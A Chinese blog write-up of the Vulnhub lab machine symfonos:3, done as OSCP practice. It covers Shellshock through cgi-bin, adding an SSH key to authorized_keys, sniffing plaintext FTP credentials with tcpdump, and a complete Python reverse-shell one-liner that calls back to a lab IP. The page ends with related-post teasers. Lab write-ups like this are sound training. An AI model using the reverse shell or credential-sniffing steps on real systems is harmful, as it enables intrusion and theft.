oscp——symfonos:3
0x00 前言
这个是练习的第6个机子。
目标地址
https://www.vulnhub.com/entry/symfonos-3,332/
参考文章
https://www.wandouip.com/t5i400700/
https://cloud.tencent.com/developer/article/1523899
0x01 实验
1.信息收集
1.1 ip收集
1.2 开放端口
为了防止其他端口开放,这里尝试一下全端口扫描。
没有开放其他的端口
2.攻击尝试
2.1 端口攻击尝试
21,22查了一下,没啥洞,爆破我都没勇气尝试。。。。
2.2 web攻击尝试
开放了80端口,这里进行访问,只是看到一个图片
遇事不决扫目录,用dirb扫一下,发现cgi-bin
用dirbuster接着扫一下其他的目录,这里需要注意的是,如果不是自动的可能不会进行下一级目录的扫描,
所以这里针对gase和cgi-bin进行一个扫描
这里可以看到一个underworld的目录。
访问一下看到了这个
好了。。。现有水平就停在这里了,原谅我不争气的去看wp了。(爆破目录也去看了wp。。。。。无奈又难过),如果有一天有人看到了这里,那么我们一起努力,总有一天别人看的wp都是我们自己写的。
爱老婆哟(我老婆肯定看不到,哈哈哈哈)
根据大佬的提示
uptime
然后需要补充一下shellshock的相关知识
我这里进行了一个复现
https://blog.csdn.net/qq_36869808/article/details/104005219
这里使用payload直接进行提权
看了国外大大的方法,我也ssh连一下
# 创建秘钥
ssh-keygen -t rsa -b 4096
# 查看一下pub秘钥
echo 写入authorized_keys
# 这里权限我记得高了会出问题,就600
chmod 600 600 authorized_keys
ssh 目标 -i id_rsa
然后就是提权问题了。
这里,大佬的操作为我打开了新世界的大门????nc可以传文件,好牛皮啊,我都是直接把东西放在服务器里,然后wget下载的。
给权限然后运行一下
这里可以看到有一个ftp的东西在运行,由于ftp是明文传输的,按照大佬的说法是可以进行抓包的
这里我被坑坏了。。。。
由于设置的时候使用了net模式,好像是因为这个导致我拿到的shell没法进行tcpdump,欲哭无泪
更换了自选模式,就可以抓包了
抓包,然后使用nc回传文件
tcpdump -i lo -w dump.pcap
然后Wireshark打开,跟踪一下流
这里可以得到账号密码,然后ssh连一下
这里用了大佬的shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.25.165",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等一会儿 shell成功的弹回来了
完成!
3.总结
感觉自己除了nmap还有扫目录其他都是知识盲区???
这里主要学习到了通过shellshock拿到权限
pspy64查看所有进程
ftp明文传输可抓包
python后门一个
oscp——symfonos:3相关推荐
- OSCP - symfonos writeup
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z 用到的知识点: SMB使用 wpscan 本地 ...
- 渗透测试入门23之OSCP渗透测试认证经验分享
"120天的旅程即将结束,以一场历时24小时没有选择题的考试,收获屠龙路上第一座里程碑.-" 这是我通过OSCP认证考试时,第一时间的感受.自豪和欣喜之情不亚于2008年我拿下CC ...
- Vulnhub靶场之symfonos:1
靶场的下载地址:点我. 信息收集 nmap -sP 192.168.157.145/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09 ...
- OSCP证书考试总结与终身学习 - 带你走上 OSCE3
写在最前 如果你是信息安全爱好者,如果你想考一些证书来提升自己的能力,那么欢迎大家来我的 Discord 频道 Northern Bay.邀请链接在这里: https://discord.gg/9Xv ...
- PWK 以及 OSCP 常见问题
OSCP 最近在安全圈子越来越受到认知,Offsec 最近更新了一篇博文,关于 PWK 以及 OSCP 最常见的问题.本文挑一些重点讲一下: 什么是 PWK 以及 OSCP PWK 是为信息安全专业人 ...
- 【Oscp备考-Kioptrix 1】
tip:时隔一年半,再次想提升一下自己的渗透能力水平,所以再三决定下想要开始的自己提升路OSCP备考,今天开始会分享自己的靶机渗透笔记呀,从0到OSCP,大家可以一起交流呀,学习,也欢迎大佬指点! 今 ...
- OSCP 2021攻略之旅--从小白到通过
1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...
- OSCP学习笔记总结(本资料禁止转载)
OSCP学习笔记 一.侦查与枚举 1.渗透日志记录 script target.log 2.端口扫描 (1)Nmap nmap -sS -Pn -n -A x.x.x.x 不重试扫描所有udp端口 n ...
- 网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
关注网络安全攻防领域的筒子们,肯定对OSCP.CISP-PTE.CISP-PTS.CISP-IRE.CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享. 1.OSCP-国际渗透测试专家 国 ...
最新文章
- Python 列表、字典、元组的一些小技巧
- 《ASP.NET MVC 4框架揭秘》试读章节
- 20165204 第十周课下作业补做
- LINUX性能调优方法总结
- 【Nutch基础教程之七】Nutch的2种运行模式:local及deploy
- 第三十三期:连接池中非常关键的两个参数,到底是干啥用的?
- OA系统:规避选型误区
- 使用IIS 7.0 Smooth Streaming 优化视频服务
- 开通博客,记录一下。
- 图书管理系统(课程设计)
- html语言em,html中em单位 网页代码的问题:em是什么单位?
- vue项目 报错 Extra semicolon (semi)
- NYOJ371-机器人II
- 【React-Native】集成微信官方安卓端SDK,实现微信登录、发送/分享小程序消息等功能
- 什么是ACCESS端口?此端口如何处理数据帧?
- Selenium IDE录制脚本——Chrome浏览器使用介绍
- ubuntu linux moodle安装
- jackson如何创建json对象和jackson工具类
- 解决win10笔记本电脑无法开启热点
- 微信小程序开发准备: